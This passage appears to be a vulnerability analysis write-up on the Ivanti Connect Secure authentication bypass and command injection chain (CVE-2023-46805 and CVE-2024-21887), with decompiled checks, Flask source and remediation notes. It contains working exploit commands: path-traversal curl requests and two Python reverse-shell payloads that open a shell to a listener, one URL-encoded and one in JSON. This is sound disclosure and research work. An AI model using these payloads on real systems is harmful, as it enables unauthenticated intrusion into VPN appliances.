/api/v1/sdpotp" -"POST, 302, /api/v1/sdpotp" -"PUT, 302, /api/v1/sdpotp" -"DELETE, 302, /api/v1/sdpotp" +"GET, 403, /api/v1/sdpotp" +"POST, 403, /api/v1/sdpotp" +"PUT, 403, /api/v1/sdpotp" +"DELETE, 403, /api/v1/sdpotp" "GET, 403, /api/v1/snmp/download-mib" "POST, 403, /api/v1/snmp/download-mib" "PUT, 403, /api/v1/snmp/download-mib" @@ -682,10 +682,10 @@ "POST, 403, /api/v1/system/failed-login-count" "PUT, 403, /api/v1/system/failed-login-count" "DELETE, 403, /api/v1/system/failed-login-count" -"GET, 200, /api/v1/system/healthcheck" -"POST, 200, /api/v1/system/healthcheck" -"PUT, 200, /api/v1/system/healthcheck" -"DELETE, 200, /api/v1/system/healthcheck" +"GET, 403, /api/v1/system/healthcheck" +"POST, 403, /api/v1/system/healthcheck" +"PUT, 403, /api/v1/system/healthcheck" +"DELETE, 403, /api/v1/system/healthcheck" "GET, 403, /api/v1/system/ifmap/imported-sessions" "POST, 403, /api/v1/system/ifmap/imported-sessions" "PUT, 403, /api/v1/system/ifmap/imported-sessions" @@ -830,10 +830,10 @@ "POST, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/" "PUT, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/" "DELETE, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/" -"GET, 405, /api/v1/totp/user-backup-code" -"POST, 500, /api/v1/totp/user-backup-code" -"PUT, 405, /api/v1/totp/user-backup-code" -"DELETE, 405, /api/v1/totp/user-backup-code" +"GET, 403, /api/v1/totp/user-backup-code" +"POST, 403, /api/v1/totp/user-backup-code" +"PUT, 403, /api/v1/totp/user-backup-code" +"DELETE, 403, /api/v1/totp/user-backup-code" "GET, 403, /api/v1/ueba/" "POST, 403, /api/v1/ueba/" "PUT, 403, /api/v1/ueba/"
Of the 376 URI paths pulled from the web and REST servers, 15 have a different HTTP response after the mitigation has been applied, and all are located in the REST API. So we will focus our attention on the Python based REST API service.
After investigating several of the endpoints that returned a different HTTP response, we focus on the endpoint /api/v1/totp/user-backup-code
. The native code web server has a function doAuthCheck
that will test a URI to see if authentication needs to be performed, before the request is served. We can see that several paths do not need authentication. Of note is the use of a strncmp
, which will only check the first N characters of the path. This means that a path that begins with /api/v1/totp/user-backup-code
will not have authentication enforced, and this path can also contain additional characters appended to it, all of which will be passed to the Python backend REST service when the request is proxied.
// web!doAuthCheck bool __cdecl doAuthCheck(DSLog::Debug *a1, unsigned int *a2) { // ...snip... uri_path = a1->uri_path; if ( !strncmp((const char *)uri_path, "/api/v1/ueba/", 0xDu) || !strncmp((const char *)uri_path, "/api/v1/integration/", 0x14u) || !strncmp((const char *)uri_path, "/api/v1/dsintegration", 0x15u) || !strncmp((const char *)uri_path, "/api/v1/pps/action/", 0x13u) || !strncmp((const char *)uri_path, "/api/my-session", 0xFu) || !strncmp((const char *)uri_path, "/api/v1/totp/user-backup-code", 0x1Du) // <--- || !strncmp((const char *)uri_path, "/api/v1/esapdata", 0x10u) || !strncmp((const char *)uri_path, "/api/v1/sessions", 0x10u) || !strncmp((const char *)uri_path, "/api/v1/tasks", 0xDu) || !strncmp((const char *)uri_path, "/api/v1/gateways", 0x10u) || !strncmp((const char *)uri_path, "/_/api/aaa", 0xAu) || !strncmp((const char *)uri_path, "/api/v1/oidc", 0xCu) ) { return 1; // <--- } // ...go on and enforce authentication...
Additional authentication checks appear to occur in the function PyRestHandler::handleRequest
, but not for the path /api/v1/totp/user-backup-code
.
Knowing we can reach the internal Python REST service by requesting the unauthenticated /api/v1/totp/user-backup-code
endpoint, and knowing we can also supply additional characters in the path, all of which will be passed to the Python Flask application, we can experiment with trying to access other resources located in the Flask application by using double dot notation. It transpires that we can access any resource in the Flask application using this technique, bypassing any authentication checks in the native web server.
To test the auth bypass we first try to access the authenticated REST API endpoint /api/v1/system/system-information
while providing neither an authentication cookie nor a valid API key. As expected, this request will fail with a HTTP 403 forbidden error.
$ curl -ik https://192.168.86.111/api/v1/system/system-information HTTP/1.1 403 Forbidden Transfer-Encoding: chunked X-XSS-Protection: 1 Strict-Transport-Security: max-age=31536000
Next we can access our target endpoint via the auth bypass technique, by using a URI path of /api/v1/totp/user-backup-code/../../system/system-information
. We can see this request will succeed, returning the system information.
$ curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 200 OK Content-Type: application/json Content-Length: 297 {"software-inventory":{"software":{"build":"1647","name":"IVE-OS","type":"operating-system","version":"22.3R1"}},"system-information":{"hardware-model":"ISA-V","host-name":"localhost2","machine-id":"*****************","os-name":"ive-sa","os-version":"22.3R1","serial-number":"*****************"}}
We can now access any endpoint in the Python REST backend, and can begin to search for a suitable authenticated command injection vulnerability to chain to this auth bypass to, in order to achieve unauthenticated RCE.
Injecting Commands
As we are hunting for a command injection vulnerability, and we are targeting a Python service, a good candidate to search for is the usage of Popen
and system
function calls. These functions allow for the creation of a child process with caller supplied arguments and are often the cause of command injection vulnerabilities in Python applications.
The REST service implements the logic for its endpoints in the restservice-0.1-py3.6.egg
file, so we can extract this and grep for candidates to go bug hunting in.
$ unzip ics_disk1/root/home/venv3/lib/python3.6/site-packages/restservice-0.1-py3.6.egg -d restservice-0.1 $ cd restservice-0.1/ restservice-0.1$ grep -r Popen --include=*.py restservice/api/resources/config.py: proc = subprocess.Popen( restservice/api/resources/config.py: proc = subprocess.Popen(args, stdout=subprocess.PIPE) restservice/api/resources/config.py: proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE) restservice/api/resources/localbackupsysconfiganduseracc.py: proc = subprocess.Popen( restservice/api/resources/localbackupsysconfiganduseracc.py: proc = subprocess.Popen( restservice/api/resources/localbackupsysconfiganduseracc.py: proc = subprocess.Popen( restservice/api/resources/controller.py: proc = subprocess.Popen( restservice/api/resources/controller.py: proc = subprocess.Popen( restservice/api/resources/exportxml.py: proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE) restservice/api/resources/webprofile.py: proc = subprocess.Popen( restservice/api/resources/webprofile.py: cabbase_proc = subprocess.Popen( restservice/api/resources/awsazuretestconnection.py: proc = subprocess.Popen( restservice/api/resources/html5.py: # proc = subprocess.Popen(smbClientCmd, shell=True, stdout=subprocess.PIPE) restservice/api/resources/nsaregistration.py: proc = subprocess.Popen( restservice/api/resources/exportuniversalxml.py: proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE) restservice/api/resources/license.py: proc = subprocess.Popen( restservice/api/resources/license.py: proc = subprocess.Popen( restservice/api/resources/license.py: proc = subprocess.Popen( restservice/api/resources/license.py: proc = subprocess.Popen( restservice/api/resources/license.py: proc = subprocess.Popen(
Reviewing the 20 results that come back we identify several usages of Popen
whereby the command passed to Popen
is constructed from a sequence of +
operators which concatenate the strings together. Popen
can alternatively take an array of arguments rather than a single string, and some of the results from our grepping above use this form, which is generally safe from command injection (but not necessarily argument injection).
We identified two authenticated command injection vulnerabilities, both of which are likely candidates for CVE-2024-21887. We have verified that both vulnerabilities are prevented from working when the vendor supplied mitigation is applied.
First Command Injection
Of the instances of Popen
that concatenate their command string together, we identify the get
method in the file restservice/api/resources/license.py
which handles requests for the endpoint /api/v1/license/keys-status
.
class License(Resource): """ Handles requests that are coming for licensing APIs For now the only API is license/auth-code """ # ...snip... def get(self, url_suffix=None, node_name=None): if request.path.startswith("/api/v1/license/keys-status"): try: dsinstall = os.environ.get("DSINSTALL") if node_name == None: node_name = "" proc = subprocess.Popen( dsinstall + "/perl5/bin/perl" + " " + dsinstall + "/perl/getLicenseCapacity.pl" + " getLicenseKeys " + node_name, # <--- shell=True, stdout=subprocess.PIPE, )
If an attacker can supply an arbitrary node_name
value, then command injection can be achieved. As this is a Flask application, we look to see how these endpoints are mapped by inspecting restservice\api\__init__.py
.
import logging from flask import Flask from flask_restful import Api from logger.logger import Logger from logger.proxyhandler import ProxyHandler app = Flask(__name__) app.logger.setLevel(logging.DEBUG) app.logger.addHandler(ProxyHandler("CONFIG:API:APP")) ive_logger = Logger() api = Api(app) # ...snip... api.add_resource( License, # ...snip... "/api/v1/license/keys-status", "/api/v1/license/keys-status/<path:node_name>", # <--- # ...snip... resource_class_kwargs={"ive_logger": ive_logger}, ) # ...snip...
We can see the parameter node_name
is automatically mapped from the trailing path segment in the request’s URI path /api/v1/license/keys-status/<path:node_name>
. We can therefore achieve an unauthenticated command injection by performing a GET request to the URI path /api/v1/totp/user-backup-code/../../license/keys-status/;CMD;
, (where CMD is an arbitrary linux OS command).
By using the semicolon character we can specify an arbitrary command to execute during Popen
. As we are passing the arbitrary command as part of the URI in the GET request, we must URL encode our payload. For example a Python based reverse shell payload:
;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.43",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';
Will be encoded as follows:
%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%38%36%2e%34%33%22%2c%34%34%34%34%29%29%3b%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%2c%73%74%64%69%6e%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%6f%75%74%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%65%72%72%3d%73%2e%66%69%6c%65%6e%6f%28%29%29%27%3B
And we can exploit the appliance with a single curl request and achieve unauthenticated OS command execution:
$ curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../license/keys-status/%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%38%36%2e%34%33%22%2c%34%34%34%34%29%29%3b%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%2c%73%74%64%69%6e%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%6f%75%74%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%65%72%72%3d%73%2e%66%69%6c%65%6e%6f%28%29%29%27%3B
We have verified that the vendor-supplied mitigation will prevent this exploit from working.
Second Command Injection
As we found several occurrences of Popen
, we also identified a second authenticated command injection vulnerability. The file restservice\api\resources\awsazuretestconnection.py
has the following function to handle POST requests to the endpoint /api/v1/system/maintenance/archiving/cloud-server-test-connection
.
class AwsAzureTestConnection(Resource): # ...snip... def post(self): """ Available API /api/v1/system/maintenance/archiving/cloud-server-test-connection POST Body: { "type":"AZURE", "txtS3Server":"<AWS-S3-bucket-name>", "txtS3Directory":"<AWS-S3-bucket-location>", "txtS3User":"<AWS-access-key>", "txtS3Password":"<AWS-secret-key>", "txtazureServer":"<Azure-server-name>", "txtazureUser":"<Azure-user-name>", "txtazurePassword":"<Azure-password>" } /api/v1/system/maintenance/archiving/cloud-server-test-connection POST Body: { "type": "GCP", "txtGCPProject":"ProjName", "txtGCPSecret":"/homes/preritc/JsonKey", "txtGCPPath":"Path/DirPath", "txtGCPBucket":"bucket-mumbai" } """ server_information = [] method = "" if request.path.endswith("cloud-server-test-connection"): if request.json is None: return make_response( jsonify(self.get_error_response("Accepts only JSON")), 400 ) else: if "type" not in request.json: return make_response( jsonify( self.get_error_response( "Please specify the Type as AWS or AZURE or GCP" ) ), 400, ) else: tmpKeyFile = None method = request.json.get("type", "") # <--- if method == "GCP": secretKeyJson = request.json.get("txtGCPSecret") if not secretKeyJson: # Secret Key not provided in request body, look for existing config in cache ci = DSCacheItem("archive", "info") table = DSUtilTable() ci.getUtilTable(table) secretKeyJson = table.getValue("password") if not secretKeyJson: return make_response( jsonify( self.get_error_response( "No existing Secret Key configuration found, please upload an appropriate JSON file and try again." ) ), 400, ) try: # Attribute is expected to have file content in base64 encoded format secretKeyJson = base64.b64decode(secretKeyJson) # File with decoded JSON required by CloudStorageClient tool to test the connection tmpKeyFile = tempfile.NamedTemporaryFile(suffix=".json") tmpKeyFile.write(secretKeyJson) tmpKeyFile.seek(0) request.json["txtGCPSecret"] = tmpKeyFile.name except (base64.binascii.Error, OSError) as err: return make_response( jsonify( self.get_error_response( "Could not store secret key JSON in temporary file. Error: {0}".format( err ) ) ), 400, ) for i in gcpserverMajorKeys: if ( i in list(request.json.keys()) and len(request.json.get(i, "")) > 0 ): server_information.append(request.json.get(i, "")) else: server_information.append("None") if method == "AWS": for i in awsserverMajorKeys: if ( i in list(request.json.keys()) and len(request.json.get(i, "")) > 0 ): server_information.append(request.json.get(i, "")) else: server_information.append("None") if method == "AZURE": for i in azureserverMajorKeys: if ( i in list(request.json.keys()) and len(request.json.get(i, "")) > 0 ): server_information.append(request.json.get(i, "")) else: server_information.append("None") for i in serverOptionKeys: if ( i in list(request.json.keys()) and request.json.get(i, "") != "" ): server_information.append(request.json.get(i, "")) else: server_information.append("filter_default") for i in serverCheckKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) for i in serverUploadLogKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) for i in serverSensorsLogFilterKeys: if ( i in list(request.json.keys()) and request.json.get(i, "") != "" ): server_information.append(request.json.get(i, "")) else: server_information.append("filter_default") for i in serverSensorsLogKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) for i in serverXmlKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) for i in serverIVSKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) for i in serverIVSPasswdKeys: if ( i in list(request.json.keys()) and len(request.json.get(i, "")) > 0 ): server_information.append(request.json.get(i, "")) else: server_information.append("None") for i in serverURSdbKeys: if ( i in list(request.json.keys()) and len(request.json.get(i, "")) > 0 ): if len(request.json.get(i, "")) > 0: server_information.append(1) else: server_information.append(0) for i in serverURSPasswordKeys: if ( i in list(request.json.keys()) and len(request.json.get(i, "")) > 0 ): if len(request.json.get(i, "")) > 0: server_information.append(1) else: server_information.append(0) for i in serverDebugLogKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) for i in serverSnapShotKeys: if i in list(request.json.keys()): if request.json.get(i, "") == "ON": server_information.append(1) else: server_information.append(0) if (request.json.get("chkExcludeLargeData", "") == "") or ( "chkExcludeLargeData" not in request.json ): server_information.append(0) if request.json.get("chkExcludeLargeData", "") == "ON": server_information.append(1) if method == "GCP": if ( "txtGCPPath" in list(request.json.keys()) and request.json.get("txtS3Path", "") != "" ): server_information.append( request.json.get("txtGCPPath", "") ) else: server_information.append("") if method == "AWS": if ( "txtS3Path" in list(request.json.keys()) and request.json.get("txtS3Path", "") != "" ): server_information.append(request.json.get("txtS3Path", "")) else: server_information.append("") if method == "AZURE": if ( "txtAzurePath" in list(request.json.keys()) and request.json.get("txtAzurePath", "") != "" ): server_information.append( request.json.get("txtAzurePath", "") ) else: server_information.append("")
We can see above that the variable called method
is set from the request’s JSON content data, via a key called type
. If an attacker supplies a semicolon delimited OS command in this value it will be executed via Popen
.
dsinstall = os.environ.get("DSINSTALL") proc = subprocess.Popen( dsinstall + "/perl5/bin/perl" + " " + dsinstall + "/perl/AwsAzureTestConnection.pl " + method # <--- + " " + " ".join([str(x) for x in list(server_information)]), shell=True, stdout=subprocess.PIPE, )
Using the same python reverse shell payload from the first command injection, we can construct a JSON structure to trigger the vulnerability (as the payload is in JSON, it does not need to be URL-encoded).
{ "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.86.35\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';", "txtGCPProject": "a", "txtGCPSecret": "a", "txtGCPPath": "a", "txtGCPBucket": "a" }
While the endpoint /api/v1/system/maintenance/archiving/cloud-server-test-connection
is authenticated, we can chain the auth bypass vulnerability and construct an unauthenticated URI path /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection
to reach this endpoint and exploit the vulnerability.
A single curl request to achieve unauthenticated OS command execution is then performed as follows:
curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.86.43\\\",4444));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'
We have verified that the vendor supplied mitigation will prevent this exploit from working.
Remediation
Ivanti disclosed both CVE-2023-46805 and CVE-2024-21887 on January 10, 2024, but this was done prior to the release of official patches, which are scheduled for a staggered release beginning on January 22, 2024. Ivanti has provided an interim solution in the form of an XML mitigation file that blocks access to certain URLs in order to prevent the exploit chain from working. It is highly recommended to apply this interim workaround on an urgent basis.
A knowledge base article is available for further details on Ivanti’s interim workaround.
References
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: